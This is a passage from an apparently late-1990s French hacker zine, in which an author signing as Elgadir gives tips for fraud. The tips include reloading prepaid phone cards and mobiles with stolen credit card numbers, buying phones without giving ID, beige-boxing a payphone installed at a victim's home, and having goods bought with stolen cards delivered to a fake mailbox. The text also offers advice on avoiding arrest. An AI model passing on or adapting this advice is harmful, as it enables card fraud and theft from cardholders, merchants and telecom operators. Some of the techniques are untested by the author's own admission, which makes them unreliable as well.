3.2 Vous achetez une carte de tlphone prpaye, a coute 50 F chez Franprix.
Vous l'achetez pas avec le No de CB, mais avec vos sous sous que vous avez 
gagn difficilement en gardant 2 mioches qui ... Excusez moi, je m'gare. 
Now, vous avez juste  recharger la carte avec le No de CB en mettant un max
de thunes dessus, et vous phonez gratis comme un ouf now.
Par contre, utilisez plutt cette tech d'une cabine. Si vous le faites de chez vous
pour aller sur Internet, mettez au moins 3651 devant vot no, et venez pas pleurez
quand vous serez en tle.

3.3 Alors, cette tech, c'est moi qui l'ai invent mme si j'ai jamais test,
mais normalement a doit marcher. Alors, le but du jeu, c'est de commander une
cabine tlphonique (comme celles ki ya dans la rue), vous vous demerdez pour
l'installer chez un pov con, et vous venez chez lui pour beige-boxer la cabine ;)=
Si vous le faites ==> mail plzz

3.4 Vous achetez un portable  carte, Entre libre ou Nomad, mais surtout pas
Mobicarte (fuck FT!!). Vous faites en sorte que le mssieur qui vous vend le 
portable vous demande pas vot nom, si il le fait, donnez une vieille excuse,
genre, vous avez pas vos papiers... Normalement a passe. Ou sinon, allez chez
Darty, les vendeurs y sont trop cons, ils demandent pas vot nom (test et approuv
par Elgadir ;) L, vous avez ptet dpens 500 balles, mais vous pairez plus 
jamais vos communications parce que vous allez recharger avec le No de CB.
A priori, vous riquez une seule chose : qu'on vous coupe la ligne, mais bon,
je n'ai jamais vu Bouygues le faire (SFR, je sais pas...). Ils vont pas 
s'amuser a rechercher un pov gars qui arnaque un aut pov gars (le bof!) de
euh... ah peine 5000 F par mois...

3.5 Vous prenez un forfait Internet, Onetel a marche plus, prenez autre chose.
Et puis, vous donnez le No de CB, mais c'est trs dconseill parce que le provider
reconnait le no d'appel...

IV. Aller sur les sites de cul. Cette technique est trs conseille, et si vous
passer par une connection pirate au net, vous risquez que dalle! De plus cette 
utilisation a t test par NOs;) vous pouvez lui faire confiance alors...

V. Commander tout plein de matos sur le net. Ca marche QUE si vous avez
une fausse boite aux lettre quelque part, une vrai, pas un vieux compte mail
chez yahoo ;) Bon, la c'est simple, vous commandez ce que vous voulez, le colis
arrive par la poste (avec www.alaxis.com) et vous le rcuperez dans la boite
aux lettres. Et dmerdez vous pour ne pas avoir  aller  la poste et devoir
montrer une ID card, sinon, zetes dans la merde...

	Voil, j'espre avoir fait le tour du sujet, s'il manque un truc, vous avez
mon mail et ma VMB. Aussi, excusez moi, je dlirais un peu trop, je serais plus
srieux dans mon prochain article sur... euh... dans mon prochain article ;)


    
						Elgadir



,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
      

      *********************************************************************
	* 											  *
	*                           Le Mot de la fin...                     *
	*      										  *
	*********************************************************************




	Voil c'tait l'issue #1 de notre zine sur certaines techniques qui aideront 
(en tout cas nous l'esperons) les newbies qui comme nous essaye
de percer , non pas pour devenir une elite mais pour se satisfaire, pour le plaisir 
d'apprendre ce que l'on aime. Si cela pouvait aider a redonner du mouvement a la 
scene francaise de l'underground et bien on en saurait d'autant plus heureux.
Envoyez-nous vos commentaires, vos soutiens et meme vos critique.
Merci d'avoir lu ce mag et nous esperons que vous y ayez au moins appris quelquechose. 
si ce n'est pas dans les articles, que vous preniez au moins conscience de ce a quoi 
Internet risque de devenir si nous ne faisons pas tous des efforts.

Bonne continuation ...

                              Toute l'equipe de la BrainStormCrew.

















